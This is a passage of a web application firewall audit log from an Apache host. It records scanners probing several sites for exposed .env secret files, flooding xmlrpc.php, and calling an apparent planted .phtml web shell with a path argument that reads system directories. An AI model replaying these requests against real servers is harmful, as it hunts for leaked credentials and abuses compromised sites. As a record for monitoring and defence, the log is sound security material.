_sfs_id=3b0f0251807471590033e5b011cf905d1749997514; expires=Sun, 15 Jun 2025 15:25:14 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --0b041405-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/app/.env"] [unique_id "aE7XybQco3e4Gnif-OQiSQAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997513734233 1725778 (- - -) Stopwatch2: 1749997513734233 1725778; combined=1976, p1=389, p2=1487, p3=0, p4=0, p5=99, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0b041405-Z-- --4225db22-A-- [15/Jun/2025:19:55:34.546378 +0530] aE7X3AG_OhOIIVz6TXRwEgAAAAA 185.177.72.144 59652 127.0.0.1 7081 --4225db22-B-- GET /laravel/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4225db22-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=osp0v35rtk68tkbg9u8u14h5m2; path=/ Set-Cookie: _sfs_id=7d44362102dede87f692ad1ad67ee5f01749997533; expires=Sun, 15 Jun 2025 15:25:33 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --4225db22-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/laravel/.env"] [unique_id "aE7X3AG_OhOIIVz6TXRwEgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997532853250 1693203 (- - -) Stopwatch2: 1749997532853250 1693203; combined=1891, p1=361, p2=1429, p3=0, p4=0, p5=101, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4225db22-Z-- --b636ea0c-A-- [15/Jun/2025:19:55:39.005264 +0530] aE7X4jAyUstaws9su_zcngAAAAY 128.199.112.101 59896 127.0.0.1 7081 --b636ea0c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --b636ea0c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b636ea0c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7X4jAyUstaws9su_zcngAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997538060490 944852 (- - -) Stopwatch2: 1749997538060490 944852; combined=2120, p1=389, p2=1317, p3=44, p4=68, p5=187, sr=111, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b636ea0c-Z-- --1a33f364-A-- [15/Jun/2025:19:56:39.166130 +0530] aE7YHtPxWtsMww_1H9vdpQAAABc 128.199.112.101 47614 127.0.0.1 7081 --1a33f364-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1a33f364-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1a33f364-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7YHtPxWtsMww_1H9vdpQAAABc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997598228284 937901 (- - -) Stopwatch2: 1749997598228284 937901; combined=1971, p1=363, p2=1264, p3=41, p4=52, p5=160, sr=107, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1a33f364-Z-- --72d10f49-A-- [15/Jun/2025:19:56:48.371392 +0530] aE7YKNPxWtsMww_1H9vdqAAAABc 52.3.155.146 34778 127.0.0.1 7081 --72d10f49-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/security/limits.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.3.155.146 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --72d10f49-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2783 Connection: close Content-Type: text/html; charset=UTF-8 --72d10f49-H-- Message: Warning. Matched phrase "etc/security/limits" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:path: /etc/security/limits.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/limits" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:path: /etc/security/limits.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7YKNPxWtsMww_1H9vdqAAAABc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749997608367457 3996 (- - -) Stopwatch2: 1749997608367457 3996; combined=2033, p1=396, p2=1511, p3=32, p4=31, p5=63, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --72d10f49-Z-- --a05e375b-A-- [15/Jun/2025:19:57:20.100718 +0530] aE7YSFu1-lKBbvo2E9pSbAAAAAw 149.102.229.174 39366 127.0.0.1 7081 --a05e375b-B-- GET /.env HTTP/1.0 Host: www.arrayz.com X-Real-IP: 149.102.229.174 X-Accel-Internal: /internal-nginx-static-location Connection: close --a05e375b-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a05e375b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.arrayz.com"] [uri "/.env"] [unique_id "aE7YSFu1-lKBbvo2E9pSbAAAAAw"] Stopwatch: 1749997640097295 3472 (- - -) Stopwatch2: 1749997640097295 3472; combined=1996, p1=567, p2=1379, p3=0, p4=0, p5=50, sr=160, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a05e375b-Z-- --7b21893b-A-- [15/Jun/2025:19:57:40.153712 +0530] aE7YW7Qco3e4Gnif-OQiiwAAABg 128.199.112.101 56886 127.0.0.1 7081 --7b21893b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7b21893b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7b21893b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7YW7Qco3e4Gnif-OQiiwAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997659107439 1046329 (- - -) Stopwatch2: 1749997659107439 1046329; combined=2560, p1=481, p2=1646, p3=53, p4=71, p5=189, sr=184, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b21893b-Z-- --d2f1c11d-A-- [15/Jun/2025:19:58:39.963844 +0530] aE7Yl1u1-lKBbvo2E9pSpwAAAAw 128.199.112.101 50618 127.0.0.1 7081 --d2f1c11d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --d2f1c11d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d2f1c11d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7Yl1u1-lKBbvo2E9pSpwAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997719040265 923646 (- - -) Stopwatch2: 1749997719040265 923646; combined=2411, p1=432, p2=1448, p3=48, p4=73, p5=243, sr=102, sw=167, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2f1c11d-Z-- --66a3c677-A-- [15/Jun/2025:19:59:40.290650 +0530] aE7Y0_BjOElwBJ15crRKugAAAAM 128.199.112.101 50948 127.0.0.1 7081 --66a3c677-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --66a3c677-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --66a3c677-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7Y0_BjOElwBJ15crRKugAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997779292247 998470 (- - -) Stopwatch2: 1749997779292247 998470; combined=2097, p1=403, p2=1304, p3=41, p4=56, p5=182, sr=109, sw=111, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --66a3c677-Z-- --b86eff76-A-- [15/Jun/2025:19:59:53.031799 +0530] aE7Y4JK-05zbifgH_rT2QwAAAAU 185.177.72.204 44216 127.0.0.1 7081 --b86eff76-B-- GET /.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b86eff76-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --b86eff76-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env"] [unique_id "aE7Y4JK-05zbifgH_rT2QwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997792025416 1006462 (- - -) Stopwatch2: 1749997792025416 1006462; combined=1750, p1=412, p2=1220, p3=0, p4=0, p5=117, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b86eff76-Z-- --53c75908-A-- [15/Jun/2025:19:59:54.321023 +0530] aE7Y4TFH_cIWXKTtjcasowAAABY 185.177.72.204 44280 127.0.0.1 7081 --53c75908-B-- GET /app/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --53c75908-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --53c75908-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/app/.env"] [unique_id "aE7Y4TFH_cIWXKTtjcasowAAABY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997793361796 959305 (- - -) Stopwatch2: 1749997793361796 959305; combined=1652, p1=364, p2=1189, p3=0, p4=0, p5=99, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53c75908-Z-- --d0245b12-A-- [15/Jun/2025:19:59:55.609189 +0530] aE7Y4tg39TKi8vFFY7LdvwAAAAI 185.177.72.204 44342 127.0.0.1 7081 --d0245b12-B-- GET /.env.bak HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d0245b12-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --d0245b12-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.bak"] [unique_id "aE7Y4tg39TKi8vFFY7LdvwAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/.env.bak"] [unique_id "aE7Y4tg39TKi8vFFY7LdvwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997794651261 957995 (- - -) Stopwatch2: 1749997794651261 957995; combined=2060, p1=418, p2=1524, p3=0, p4=0, p5=117, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d0245b12-Z-- --51a6844a-A-- [15/Jun/2025:19:59:57.000076 +0530] aE7Y4zFH_cIWXKTtjcaspAAAABY 185.177.72.204 44412 127.0.0.1 7081 --51a6844a-B-- GET /.env.example HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --51a6844a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --51a6844a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.example"] [unique_id "aE7Y4zFH_cIWXKTtjcaspAAAABY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997795948815 1051323 (- - -) Stopwatch2: 1749997795948815 1051323; combined=154080, p1=464, p2=1190, p3=0, p4=0, p5=76263, sr=114, sw=1, l=0, gc=76162 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --51a6844a-Z-- --32cfe87a-A-- [15/Jun/2025:19:59:58.340355 +0530] aE7Y5YeMkDifvSpLI-IyhQAAAAQ 185.177.72.204 44486 127.0.0.1 7081 --32cfe87a-B-- GET /.env.local HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --32cfe87a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --32cfe87a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.local"] [unique_id "aE7Y5YeMkDifvSpLI-IyhQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997797293688 1046767 (- - -) Stopwatch2: 1749997797293688 1046767; combined=1830, p1=353, p2=1387, p3=0, p4=0, p5=89, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --32cfe87a-Z-- --7598ba21-A-- [15/Jun/2025:19:59:59.676968 +0530] aE7Y5jAyUstaws9su_zdPAAAAAY 185.177.72.204 44530 127.0.0.1 7081 --7598ba21-B-- GET /.env.old HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7598ba21-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --7598ba21-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by 